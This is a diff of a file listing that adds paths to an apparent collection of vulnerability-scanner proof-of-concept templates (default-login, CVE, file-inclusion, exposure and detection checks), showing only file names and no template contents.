 ./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml
 ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml
 ./poc/auth/esxi-unauthorized-access.yaml
@@ -2956,6 +2971,7 @@
 ./poc/auth/feather-login-page-ec9741fc8ed10c11ede5fff4aebdf98d.yaml
 ./poc/auth/feather-login-page-fe83e7940064847c35acc8aaee4617f0.yaml
 ./poc/auth/feather-login-page.yaml
+./poc/auth/feiyuxing-default-login.yaml
 ./poc/auth/fhem-6-unauthenticated-lfi.yaml
 ./poc/auth/fido2-auth-bypass.yaml
 ./poc/auth/figma-access-token.yaml
@@ -3182,6 +3198,7 @@
 ./poc/auth/grafana-default-login.yaml
 ./poc/auth/grafana-default-password.yaml
 ./poc/auth/grafana-default-password.yml
+./poc/auth/grafana-login-check.yaml
 ./poc/auth/grafana-login.yml
 ./poc/auth/grafana-public-signup-7814.yaml
 ./poc/auth/grafana-public-signup-7815.yaml
@@ -3624,6 +3641,7 @@
 ./poc/auth/kyan-network-credentials-disclosure.yaml
 ./poc/auth/kyan-network-monitoring-account-password-leakage.yaml
 ./poc/auth/kyan-network-monitoring-account-password-leakage.yml
+./poc/auth/kylin-default-login.yaml
 ./poc/auth/label-studio-signup.yaml
 ./poc/auth/labkey-server-login.yaml
 ./poc/auth/labkey_server.yaml
@@ -3666,6 +3684,7 @@
 ./poc/auth/ldap-wp-login-integration-with-active-directory-29e7a785cec44438f0ec7f51afc250b9.yaml
 ./poc/auth/ldap-wp-login-integration-with-active-directory.yaml
 ./poc/auth/ldap-wp-login-xss.yaml
+./poc/auth/leostream-default-login.yaml
 ./poc/auth/lfi-keyed.yaml
 ./poc/auth/lh-password-changer-c227c958c99738e76b5b7118ffce1258.yaml
 ./poc/auth/lh-password-changer.yaml
@@ -4054,6 +4073,7 @@
 ./poc/auth/nacos-bypass-authentication.yaml
 ./poc/auth/nacos-core-auth-enabled-bypass.yaml
 ./poc/auth/nacos-create-user-unauthorized.yaml
+./poc/auth/nacos-default-login.yaml
 ./poc/auth/nacos-default-password.yaml
 ./poc/auth/nacos-permission-bypass-token.yaml
 ./poc/auth/nacos-token-create-user.yaml
@@ -4122,6 +4142,7 @@
 ./poc/auth/nexus-default-password.yml
 ./poc/auth/nexus-repository-unauthentication.yaml
 ./poc/auth/nifi-api-unauthorized-access.yaml
+./poc/auth/nodered-default-login.yaml
 ./poc/auth/noescape-login.yaml
 ./poc/auth/novnc-login-panel.yaml
 ./poc/auth/npm-access-token.yaml
@@ -4470,6 +4491,7 @@
 ./poc/auth/pvn-auth-popup-07f350252e6820d89f1593e944a45ac9.yaml
 ./poc/auth/pvn-auth-popup-927926491353dfb4182735ed34fafbc2.yaml
 ./poc/auth/pvn-auth-popup.yaml
+./poc/auth/pyload-default-login.yaml
 ./poc/auth/pypi-token.yaml
 ./poc/auth/pypi-upload-token.yaml
 ./poc/auth/pyspider-unauthorized-access-9742.yaml
@@ -4989,6 +5011,7 @@
 ./poc/auth/sphider-login-2.yaml
 ./poc/auth/sphider-login-3.yaml
 ./poc/auth/sphider-login.yaml
+./poc/auth/splunk-default-login.yaml
 ./poc/auth/splunk-enterprise-login-panel.yaml
 ./poc/auth/splunk-enterprise-login-panel.yml
 ./poc/auth/splunk-login-10416.yaml
@@ -5116,6 +5139,7 @@
 ./poc/auth/tensorboard-unauth.yml
 ./poc/auth/terramaster-login-10713.yaml
 ./poc/auth/terramaster-login.yaml
+./poc/auth/teslamate-unauth-access.yaml
 ./poc/auth/theme-my-login-30153aa5a56c5e3aeca98d0e663457f2.yaml
 ./poc/auth/theme-my-login-3792ca75cbb326e50cce549d5389e9b6.yaml
 ./poc/auth/theme-my-login-c0adcf17190736222b76d990855c6100.yaml
@@ -5147,6 +5171,7 @@
 ./poc/auth/tomcat-manager-default-creds.yaml
 ./poc/auth/tongda-arbitrary-login.yaml
 ./poc/auth/tongda-auth-bypass.yaml
+./poc/auth/tongda-meeting-unauth.yaml
 ./poc/auth/tongda-meeting-unauthorized-access.yaml
 ./poc/auth/tongda-meeting-unauthorized-access.yml
 ./poc/auth/tongda-meeting-unauthorizedAccess.yaml
@@ -5259,6 +5284,7 @@
 ./poc/auth/unauth-xproxy-dashboard-10968.yaml
 ./poc/auth/unauth-xproxy-dashboard-10969.yaml
 ./poc/auth/unauth-xproxy-dashboard.yaml
+./poc/auth/unauth-ztp-ping.yaml
 ./poc/auth/unauth-zwave-mqtt.yaml
 ./poc/auth/unauthen-elastic.yaml
 ./poc/auth/unauthen-kibana.yaml
@@ -5443,6 +5469,7 @@
 ./poc/auth/wcc-seo-keyword-research-ff9293ba28748efa2ab9a2fe77385468.yaml
 ./poc/auth/wcc-seo-keyword-research.yaml
 ./poc/auth/weaver-login-sessionkey.yaml
+./poc/auth/weaver-userselect-unauth.yaml
 ./poc/auth/web3-authentication-1e11e30ee0e1d20c48c7c5d6db4be9a6.yaml
 ./poc/auth/web3-authentication-53a207cc153af27c7b9bc24ea25dfec1.yaml
 ./poc/auth/web3-authentication.yaml
@@ -5690,6 +5717,7 @@
 ./poc/auth/xxljob-default-login-11713.yaml
 ./poc/auth/xxljob-default-login-11714.yaml
 ./poc/auth/xxljob-default-login.yaml
+./poc/auth/xxljob-executor-unauth.yaml
 ./poc/auth/yealink-default-login.yaml
 ./poc/auth/yealinkpreauthrce(1).yaml
 ./poc/auth/yith-custom-login-9828ed878d121d268e86215520b51df0.yaml
@@ -6872,6 +6900,7 @@
 ./poc/cisco/cisco-vmanage-log4j.yaml
 ./poc/cisco/cisco-vmanage-login.yaml
 ./poc/cisco/cisco-vpn-FileRead.yaml
+./poc/cisco/cisco-webex-log4j-rce.yaml
 ./poc/cisco/cisco-webex.yaml
 ./poc/cisco/cisco-webvpn-detect.yaml
 ./poc/cisco/cisco_asa_xss.yaml
@@ -7578,6 +7607,7 @@
 ./poc/config/openid-config.yaml
 ./poc/config/openssh-server-weak-config.yaml
 ./poc/config/openssh-sshd-config-disclosure.yaml
+./poc/config/openstack-config.yaml
 ./poc/config/oracle-ebs-config-disclosure.yaml
 ./poc/config/ovpn-config-exposed.yaml
 ./poc/config/owncloud-config-9419.yaml
@@ -7743,6 +7773,7 @@
 ./poc/config/wamp-server-configuration.yaml
 ./poc/config/wanhu-ezoffice-teleconferenceservice-xxe.yaml
 ./poc/config/wanhu-oa-tele-conference-service-xxe.yaml
+./poc/config/weaver-mysql-config-info-leak.yaml
 ./poc/config/web-config-11123.yaml
 ./poc/config/web-config-11124.yaml
 ./poc/config/web-config-11125.yaml
@@ -7820,6 +7851,7 @@
 ./poc/config/wp-engine-config.yaml
 ./poc/config/wp-misconfig.yaml
 ./poc/config/wp-setup-config.yaml
+./poc/config/wp-superstorefinder-misconfig.yaml
 ./poc/config/wpconfig-aws-keys-1.yaml
 ./poc/config/wpconfig-aws-keys-2.yaml
 ./poc/config/wpconfig-aws-keys.yaml
@@ -13998,6 +14030,7 @@
 ./poc/cve/CVE-2019-25152-72081e24ce32b3d7a0640320e699b222.yaml
 ./poc/cve/CVE-2019-25152.yaml
 ./poc/cve/CVE-2019-25212-cf8915aa91ee39b2dc6d30f9dfffa142.yaml
+./poc/cve/CVE-2019-25212.yaml
 ./poc/cve/CVE-2019-2578-1.yaml
 ./poc/cve/CVE-2019-2578-2.yaml
 ./poc/cve/CVE-2019-2578.yaml
@@ -29542,6 +29575,7 @@
 ./poc/cve/CVE-2023-4691.yaml
 ./poc/cve/CVE-2023-4703-abd33185e9a1cfe9176774cce9a1e2d3.yaml
 ./poc/cve/CVE-2023-4703.yaml
+./poc/cve/CVE-2023-47115.yaml
 ./poc/cve/CVE-2023-47117.yaml
 ./poc/cve/CVE-2023-4714.yaml
 ./poc/cve/CVE-2023-4716-655d9958a5cab4adddedde4d3fd794d9.yaml
@@ -35138,6 +35172,7 @@
 ./poc/cve/CVE-2024-27197-2b9c0f9b3d20544f3ca6999a372f0770.yaml
 ./poc/cve/CVE-2024-27197.yaml
 ./poc/cve/CVE-2024-27198.yaml
+./poc/cve/CVE-2024-27199.yaml
 ./poc/cve/CVE-2024-2729-35dcecd27cee02c251e12e5eea0d0803.yaml
 ./poc/cve/CVE-2024-2729.yaml
 ./poc/cve/CVE-2024-2732-9d655b618953c1afda60e6f30252668e.yaml
@@ -41424,6 +41459,7 @@
 ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml
 ./poc/cve/CVE-2024-5382.yaml
 ./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml
+./poc/cve/CVE-2024-5416.yaml
 ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml
 ./poc/cve/CVE-2024-5418.yaml
 ./poc/cve/CVE-2024-5419-6c5a95dfcb26729f4b1f7034ca7aef48.yaml
@@ -42021,6 +42057,7 @@
 ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml
 ./poc/cve/CVE-2024-6334.yaml
 ./poc/cve/CVE-2024-6335-84de910af85c0afe2f599b3df45be46d.yaml
+./poc/cve/CVE-2024-6335.yaml
 ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml
 ./poc/cve/CVE-2024-6338.yaml
 ./poc/cve/CVE-2024-6339-8aab95c35ab2f543f319207ba5af5758.yaml
@@ -42552,6 +42589,7 @@
 ./poc/cve/CVE-2024-7624-ebfd9e3cba7ebe22ec232d00cda9ba4f.yaml
 ./poc/cve/CVE-2024-7624.yaml
 ./poc/cve/CVE-2024-7626-6cce2d74a4b9b1a75cb8e104eb400ce1.yaml
+./poc/cve/CVE-2024-7626.yaml
 ./poc/cve/CVE-2024-7627-89a7ba1cc9a6f6445a389a024cfcf883.yaml
 ./poc/cve/CVE-2024-7627.yaml
 ./poc/cve/CVE-2024-7628-3bb6c5b2894c843f8737291215f30580.yaml
@@ -42592,7 +42630,9 @@
 ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml
 ./poc/cve/CVE-2024-7717.yaml
 ./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml
+./poc/cve/CVE-2024-7721.yaml
 ./poc/cve/CVE-2024-7727-4fe4538f75c6cfd03c0ffd7da47ebf37.yaml
+./poc/cve/CVE-2024-7727.yaml
 ./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml
 ./poc/cve/CVE-2024-7770.yaml
 ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml
@@ -42659,6 +42699,7 @@
 ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml
 ./poc/cve/CVE-2024-8044.yaml
 ./poc/cve/CVE-2024-8045-fae1d4f6a9ba77de83e71f29fe31f38e.yaml
+./poc/cve/CVE-2024-8045.yaml
 ./poc/cve/CVE-2024-8046-15e0de38601f3b1bc315968586b907cd.yaml
 ./poc/cve/CVE-2024-8046.yaml
 ./poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml
@@ -42706,6 +42747,7 @@
 ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml
 ./poc/cve/CVE-2024-8252.yaml
 ./poc/cve/CVE-2024-8253-e2234cc208110923d0c092c69c0a152e.yaml
+./poc/cve/CVE-2024-8253.yaml
 ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml
 ./poc/cve/CVE-2024-8268.yaml
 ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml
@@ -42713,6 +42755,7 @@
 ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
 ./poc/cve/CVE-2024-8276.yaml
 ./poc/cve/CVE-2024-8277-60e40034fde9b34dd19d7bd360de5d19.yaml
+./poc/cve/CVE-2024-8277.yaml
 ./poc/cve/CVE-2024-8289-547295faa6591e5ec09f536a86cfff13.yaml
 ./poc/cve/CVE-2024-8289-87a431b046b6c387f38f06ebe340c64f.yaml
 ./poc/cve/CVE-2024-8289.yaml
@@ -42735,14 +42778,18 @@
 ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml
 ./poc/cve/CVE-2024-8428.yaml
 ./poc/cve/CVE-2024-8440-a970a1df0c7918e0736009309dc70109.yaml
+./poc/cve/CVE-2024-8440.yaml
 ./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml
 ./poc/cve/CVE-2024-8478.yaml
 ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml
 ./poc/cve/CVE-2024-8480.yaml
+./poc/cve/CVE-2024-8522-29b9e24c70ba3cd60461931eec1fd527.yaml
+./poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml
 ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml
 ./poc/cve/CVE-2024-8538.yaml
 ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml
 ./poc/cve/CVE-2024-8543.yaml
+./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml
 ./poc/cve/CVE_2023_49442.yaml
 ./poc/cve/CVE_2023_51467.yaml
 ./poc/cve/CVE_2024_0195.yaml
@@ -50765,6 +50812,7 @@
 ./poc/default/azure-default-page.yaml
 ./poc/default/batflat-default-login.yaml
 ./poc/default/bithighway-default-password.yaml
+./poc/default/bloofoxcms-default-login.yaml
 ./poc/default/businessintelligence-default-login-814.yaml
 ./poc/default/businessintelligence-default-login-815.yaml
 ./poc/default/businessintelligence-default-login-816.yaml
@@ -50815,11 +50863,13 @@
 ./poc/default/custom-grafana-default-login.yaml
 ./poc/default/custom-rabbit-mq-default-login.yaml
 ./poc/default/d-link-ac-centralized-management-system-default-login.yaml
+./poc/default/dataease-default-login.yaml
 ./poc/default/datahub-metadata-default-login.yaml
 ./poc/default/dataiku-default-login.yaml
 ./poc/default/datang-ac-default-password-cnvd-2021-04128.yaml
 ./poc/default/datang-ac-default-password-cnvd-2021-04128.yml
 ./poc/default/datang-ac-default-password.yaml
+./poc/default/default-apache-shiro.yaml
 ./poc/default/default-apache-test-all-6812.yaml
 ./poc/default/default-apache-test-all-6813.yaml
 ./poc/default/default-apache-test-all-6814.yaml
@@ -51024,6 +51074,7 @@
 ./poc/default/dvwa-default-login-7128.yaml
 ./poc/default/dvwa-default-login-7129.yaml
 ./poc/default/dvwa-default-login.yaml
+./poc/default/elasticsearch-default-login.yaml
 ./poc/default/elasticsearch-insecure-default-config.yaml
 ./poc/default/emcecom-default-login-7211.yaml
 ./poc/default/emcecom-default-login-7212.yaml
@@ -51034,6 +51085,7 @@
 ./poc/default/emqx-default-login-7221.yaml
 ./poc/default/emqx-default-login-7222.yaml
 ./poc/default/emqx-default-login.yaml
+./poc/default/esafenet-cdg-default-login.yaml
 ./poc/default/esafenet-cdgserver3-systemconfig-default-password.yaml
 ./poc/default/etl3100-default-login.yaml
 ./poc/default/exacqvision-default-credentials.yaml
@@ -51044,6 +51096,7 @@
 ./poc/default/exacqvision-default-login.yaml
 ./poc/default/exacqvision-default-password.yaml
 ./poc/default/express-default-page.yaml
+./poc/default/feiyuxing-default-login.yaml
 ./poc/default/flir-ax8-default-credentials-7512.yaml
 ./poc/default/flir-ax8-default-credentials.yaml
 ./poc/default/flir-default-login-7513.yaml
@@ -51192,7 +51245,9 @@
 ./poc/default/known-default-account.yaml
 ./poc/default/konga-default-jwt-key.yaml
 ./poc/default/konga-default-login.yaml
+./poc/default/kylin-default-login.yaml
 ./poc/default/ldap-default-creds.yaml
+./poc/default/leostream-default-login.yaml
 ./poc/default/lighttpd-default-8627.yaml
 ./poc/default/lighttpd-default-8628.yaml
 ./poc/default/lighttpd-default.yaml
@@ -51231,6 +51286,7 @@
 ./poc/default/mofi4500-default-password.yaml
 ./poc/default/mssql-default-logins.yaml
 ./poc/default/mysql-default-login.yaml
+./poc/default/nacos-default-login.yaml
 ./poc/default/nacos-default-password.yaml
 ./poc/default/nagios-default-credential-8988.yaml
 ./poc/default/nagios-default-credential-8989.yaml
@@ -51258,6 +51314,7 @@
 ./poc/default/nexus-default-password-9091.yaml
 ./poc/default/nexus-default-password.yaml
 ./poc/default/nexus-default-password.yml
+./poc/default/nodered-default-login.yaml
 ./poc/default/nps-default-login-9142.yaml
 ./poc/default/nps-default-login-9143.yaml
 ./poc/default/nps-default-login-9144.yaml
@@ -51333,6 +51390,7 @@
 ./poc/default/postgres-default-logins.yaml
 ./poc/default/powerjob-default-login.yaml
 ./poc/default/prtg-default-login.yaml
+./poc/default/pyload-default-login.yaml
 ./poc/default/rabbitmq-default-admin-9780.yaml
 ./poc/default/rabbitmq-default-admin-9781.yaml
 ./poc/default/rabbitmq-default-admin-9782.yaml
@@ -51441,6 +51499,7 @@
 ./poc/default/spectracom-default-login-10406.yaml
 ./poc/default/spectracom-default-login.yaml
 ./poc/default/spectracom-default-password.yaml
+./poc/default/splunk-default-login.yaml
 ./poc/default/ssh-default-logins.yaml
 ./poc/default/stackstorm-default-login-10529.yaml
 ./poc/default/stackstorm-default-login-10530.yaml
@@ -51754,6 +51813,7 @@
 ./poc/detect/azure-takeover-detection.yaml
 ./poc/detect/azure-takeover-detection.yml
 ./poc/detect/b2b-builder-detect.yaml
+./poc/detect/bamboo-detect.yaml
 ./poc/detect/basic-auth-detect.yaml
 ./poc/detect/basic-auth-detection-687.yaml
 ./poc/detect/basic-auth-detection-688.yaml
@@ -51808,6 +51868,7 @@
 ./poc/detect/burp-api-detect-812.yaml
 ./poc/detect/burp-api-detect-813.yaml
 ./poc/detect/burp-api-detect.yaml
+./poc/detect/burp-collaborator-detect.yaml
 ./poc/detect/cacti-detect-1.yaml
 ./poc/detect/cacti-detect-2.yaml
 ./poc/detect/cacti-detect-826.yaml
@@ -51819,6 +51880,7 @@
 ./poc/detect/carestream-vue-detect-860.yaml
 ./poc/detect/carestream-vue-detect-861.yaml
 ./poc/detect/carestream-vue-detect.yaml
+./poc/detect/casaos-detection.yaml
 ./poc/detect/catalog-creator-detect.yaml
 ./poc/detect/ccm-detect.yaml
 ./poc/detect/celebrus-detect.yaml
@@ -51828,6 +51890,7 @@
 ./poc/detect/centreon-detect.yaml
 ./poc/detect/changedetection-panel.yaml
 ./poc/detect/chatgpt-next-detection.yaml
+./poc/detect/checkpoint-mobile-detect.yaml
 ./poc/detect/chevereto-detect-904.yaml
 ./poc/detect/chevereto-detect-905.yaml
 ./poc/detect/chevereto-detect.yaml
@@ -51835,6 +51898,7 @@
 ./poc/detect/chp-ads-block-detector-b7efff873ee4bed005e48f45da9d3636.yaml
 ./poc/detect/chp-ads-block-detector-dba98e5ea73e2f1d6a07c9c27a108767.yaml
 ./poc/detect/chp-ads-block-detector.yaml
+./poc/detect/chromecast-detect.yaml
 ./poc/detect/cisco-asa-honeypot-detection.yaml
 ./poc/detect/cisco-email-security-detect.yaml
 ./poc/detect/cisco-finger-detect.yaml
@@ -51947,6 +52011,7 @@
 ./poc/detect/custom-weblogic-SSRF-detect.yaml
 ./poc/detect/custom-wps-proxy-ssrf-detect.yaml
 ./poc/detect/cvent-panel-detect.yaml
+./poc/detect/cvsweb-detect.yaml
 ./poc/detect/cx-cloud-upload-detect-6766.yaml
 ./poc/detect/cx-cloud-upload-detect.yaml
 ./poc/detect/darkstat-detect-1.yaml
@@ -52047,6 +52112,7 @@
 ./poc/detect/dionaea-mysql-honeypot-detect.yaml
 ./poc/detect/dionaea-smb-honeypot-detect.yaml
 ./poc/detect/dionaea-smb-honeypot-detection.yaml
+./poc/detect/directus-detect.yaml
 ./poc/detect/django-debug-detect-7024.yaml
 ./poc/detect/django-debug-detect-7025.yaml
 ./poc/detect/django-debug-detect-7026.yaml
@@ -52099,6 +52165,7 @@
 ./poc/detect/elasticsearch-sql-client-detect.yaml
 ./poc/detect/electron-version-detect-7198.yaml
 ./poc/detect/electron-version-detect.yaml
+./poc/detect/element-web-detect.yaml
 ./poc/detect/elfinder-detect-1.yaml
 ./poc/detect/elfinder-detect-2.yaml
 ./poc/detect/elfinder-detect-7201.yaml
@@ -52338,6 +52405,7 @@
 ./poc/detect/icecast-mediaserver-detect.yaml
 ./poc/detect/icecast-server-detect.yaml
 ./poc/detect/icewarp-panel-detect.yaml
+./poc/detect/identity-server-v3-detect.yaml
 ./poc/detect/iis-detect.yaml
 ./poc/detect/iis-errorpage-detection-all-lang.yaml
 ./poc/detect/ilo-detect-8154.yaml
@@ -52459,6 +52527,7 @@
 ./poc/detect/liferay-portal-detect-8626.yaml
 ./poc/detect/liferay-portal-detect.yaml
 ./poc/detect/lightdash-detect.nuclei.yaml
+./poc/detect/limesurvey-detect.yaml
 ./poc/detect/linkerd-badrule-detect-8629.yaml
 ./poc/detect/linkerd-badrule-detect-8630.yaml
 ./poc/detect/linkerd-badrule-detect-8631.yaml
@@ -52509,6 +52578,7 @@
 ./poc/detect/mantis-detect-8781.yaml
 ./poc/detect/mantis-detect.yaml
 ./poc/detect/matrix-detect.yaml
+./poc/detect/matrix-homeserver-detect.yaml
 ./poc/detect/mautic-crm-detect-8787.yaml
 ./poc/detect/mautic-crm-detect-8788.yaml
 ./poc/detect/mautic-crm-detect.yaml
@@ -52702,6 +52772,7 @@
 ./poc/detect/openethereum-server-detect.yaml
 ./poc/detect/opengear-detect.yaml
 ./poc/detect/openhap-detect.yaml
+./poc/detect/openproject-detect.yaml
 ./poc/detect/openresty-detect.yaml
 ./poc/detect/opensis-detect-1.yaml
 ./poc/detect/opensis-detect-2.yaml
@@ -52752,6 +52823,7 @@
 ./poc/detect/phpcollab-detect-9500.yaml
 ./poc/detect/phpcollab-detect-9501.yaml
 ./poc/detect/phpcollab-detect.yaml
+./poc/detect/phplist-detect.yaml
 ./poc/detect/phpmyadmin-version-detect.yaml
 ./poc/detect/phpmyadmin-version-detection.yaml
 ./poc/detect/pi-hole-detect-9580.yaml
@@ -53056,6 +53128,7 @@
 ./poc/detect/thinkphp-debug-detected.yaml
 ./poc/detect/thinkphp-detect.yaml
 ./poc/detect/thruk-detect.yaml
+./poc/detect/tibco-businessconnect-detect.yaml
 ./poc/detect/tibco-spotfire-services-detect.yaml
 ./poc/detect/tingsboard-detect.yaml
 ./poc/detect/tomcat-detect-10792.yaml
@@ -53184,6 +53257,7 @@
 ./poc/detect/widget-detector-elementor-cb9fa42d925b49c26314653a0263606c.yaml
 ./poc/detect/widget-detector-elementor.yaml
 ./poc/detect/wing-ftp-detect.yaml
+./poc/detect/wing-ftp-service-detect.yaml
 ./poc/detect/wms-server-detect.yaml
 ./poc/detect/wondercms-detect-11221.yaml
 ./poc/detect/wondercms-detect-11222.yaml
@@ -53319,6 +53393,7 @@
 ./poc/directory_listing/ecology-filedownload-directory-traversal.yaml
 ./poc/directory_listing/ecology-filedownload-directory-traversal.yml
 ./poc/directory_listing/ecology-jqueryfiletree-directory-traversal.yaml
+./poc/directory_listing/ecology-jqueryfiletree-traversal.yaml
 ./poc/directory_listing/ecology-springframework-directory-traversal-7173.yaml
 ./poc/directory_listing/ecology-springframework-directory-traversal-7174.yaml
 ./poc/directory_listing/ecology-springframework-directory-traversal-7175.yaml
@@ -53949,6 +54024,7 @@
 ./poc/elk/elasticsearch-cve-2015-3337-lfi.yml
 ./poc/elk/elasticsearch-cve-2015-5531.yaml
 ./poc/elk/elasticsearch-cve-2015-5531.yml
+./poc/elk/elasticsearch-default-login.yaml
 ./poc/elk/elasticsearch-insecure-default-config.yaml
 ./poc/elk/elasticsearch-log4j.yaml
 ./poc/elk/elasticsearch-sql-client-detect-7189.yaml
@@ -54469,6 +54545,7 @@
 ./poc/exposed/grafana-datasource-credentials-exposure.yml
 ./poc/exposed/grafana-exposed-configuration.yaml
 ./poc/exposed/graphql-playground-exposure.yaml
+./poc/exposed/graylog-api-exposure.yaml
 ./poc/exposed/graylog-config-exposure.yml
 ./poc/exposed/graylog-endpoints-exposure.yaml
 ./poc/exposed/gruntfile-exposure-1.yaml
@@ -54695,6 +54772,7 @@
 ./poc/exposed/rails-secret-token-disclosure-9809.yaml
 ./poc/exposed/rails-secret-token-disclosure-9810.yaml
 ./poc/exposed/rails-secret-token-disclosure.yaml
+./poc/exposed/rakefile-disclosure.yaml
 ./poc/exposed/razorpay-clientid-disclosure.yaml
 ./poc/exposed/redis-commander-exposure-9851.yaml
 ./poc/exposed/redis-commander-exposure.yaml
@@ -54780,6 +54858,7 @@
 ./poc/exposed/solr-exposure.yaml
 ./poc/exposed/solr-panel-exposure.yaml
 ./poc/exposed/sonarqube-config-exposure.yml
+./poc/exposed/sonarqube-projects-disclosure.yaml
 ./poc/exposed/sonatype-nexus-config-exposure.yml
 ./poc/exposed/sony-bravia-disclosure.yaml
 ./poc/exposed/sound4-file-disclosure.yaml
@@ -54830,8 +54909,10 @@
 ./poc/exposed/unigui-server-monitor-exposure.yaml
 ./poc/exposed/v2boardv161-exposure.yaml
 ./poc/exposed/vagrantfile-exposure.yaml
+./poc/exposed/vbulletin-path-disclosure.yaml
 ./poc/exposed/venustech-4a-getMaster-disclosure.yaml
 ./poc/exposed/vercel-source-exposure.yaml
+./poc/exposed/viminfo-disclosure.yaml
 ./poc/exposed/vpc-endpoint-exposed.yaml
 ./poc/exposed/wallet-recovery-phrase-disclosure.yml
 ./poc/exposed/watchguard-credentials-disclosure-11105.yaml
@@ -54897,6 +54978,7 @@
 ./poc/exposed/zipkin-exposure-11822.yaml
 ./poc/exposed/zipkin-exposure-2.yaml
 ./poc/exposed/zipkin-exposure.yaml
+./poc/exposed/zzzcms-info-disclosure.yaml
 ./poc/extract/cookie-extractor.yaml
 ./poc/extract/drupal_module-file_extractor-arbitrary-php-code-execution.yaml
 ./poc/extract/email-extraction-7210.yaml
@@ -55119,6 +55201,7 @@
 ./poc/ftp/web-ftp-detect.yaml
 ./poc/ftp/wing-ftp-detect.yaml
 ./poc/ftp/wing-ftp-server.yaml
+./poc/ftp/wing-ftp-service-detect.yaml
 ./poc/ftp/wordpress-updraftplus-pem-key-11325.yaml
 ./poc/ftp/wordpress-updraftplus-pem-key-11326.yaml
 ./poc/ftp/wordpress-updraftplus-pem-key-11327.yaml
@@ -57111,6 +57194,7 @@
 ./poc/java/custom-jreport-admin-creds.yaml
 ./poc/java/custom-mapview-jsp-detect.yaml
 ./poc/java/custom-weblogic-SSRF-detect.yaml
+./poc/java/default-apache-shiro.yaml
 ./poc/java/default-glassfish-server-page-6852.yaml
 ./poc/java/default-glassfish-server-page-6853.yaml
 ./poc/java/default-glassfish-server-page-6854.yaml
@@ -57671,6 +57755,7 @@
 ./poc/javascript/css-js-manager.yaml
 ./poc/javascript/custom-css-js-705d050c5e0c5c96bf187eb782493157.yaml
 ./poc/javascript/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml
+./poc/javascript/custom-css-js-php.yaml
 ./poc/javascript/custom-css-js.yaml
 ./poc/javascript/custom-mapview-jsp-detect.yaml
 ./poc/javascript/cve2json.yml
@@ -58379,6 +58464,7 @@
 ./poc/local_file_inclusion/accent-microcomputers-lfi-16.yaml
 ./poc/local_file_inclusion/accent-microcomputers-lfi-17.yaml
 ./poc/local_file_inclusion/accent-microcomputers-lfi.yaml
+./poc/local_file_inclusion/acti-video-lfi.yaml
 ./poc/local_file_inclusion/ad-widget-lfi-124.yaml
 ./poc/local_file_inclusion/ad-widget-lfi-125.yaml
 ./poc/local_file_inclusion/ad-widget-lfi-126.yaml
@@ -58603,6 +58689,7 @@
 ./poc/local_file_inclusion/karel-ip-phone-lfi.yaml
 ./poc/local_file_inclusion/karenderia-cms-lfi.yaml
 ./poc/local_file_inclusion/kavita-lfi.yaml
+./poc/local_file_inclusion/kingsoft-vgm-lfi.yaml
 ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml
 ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8558.yaml
 ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8559.yaml
@@ -58744,6 +58831,7 @@
 ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml
 ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml
 ./poc/local_file_inclusion/samsung-wlan-ap-lfi.yaml
+./poc/local_file_inclusion/sangfor-ngaf-lfi.yaml
 ./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml
 ./poc/local_file_inclusion/seeyon-analyticscloud-lfi.yaml
 ./poc/local_file_inclusion/selea-targa-camera-lfi.yaml
@@ -58812,6 +58900,9 @@
 ./poc/local_file_inclusion/vmware-vcenter-lfi-linux.yaml
 ./poc/local_file_inclusion/vmware-vcenter-lfi.yaml
 ./poc/local_file_inclusion/wapples-firewall-lfi.yaml
+./poc/local_file_inclusion/weaver-officeserver-lfi.yaml
+./poc/local_file_inclusion/weaver-signaturedownload-lfi.yaml
+./poc/local_file_inclusion/weaver-sptmforportalthumbnail-lfi.yaml
 ./poc/local_file_inclusion/webp-server-go-lfi.yaml
 ./poc/local_file_inclusion/windows-lfi-fuzz.yaml
 ./poc/local_file_inclusion/wordpress-LFI.yaml
@@ -58908,6 +58999,7 @@
 ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml
 ./poc/local_file_inclusion/yishaadmin-lfi.yaml
 ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml
+./poc/local_file_inclusion/yonyou-ufida-nc-lfi.yaml
 ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml
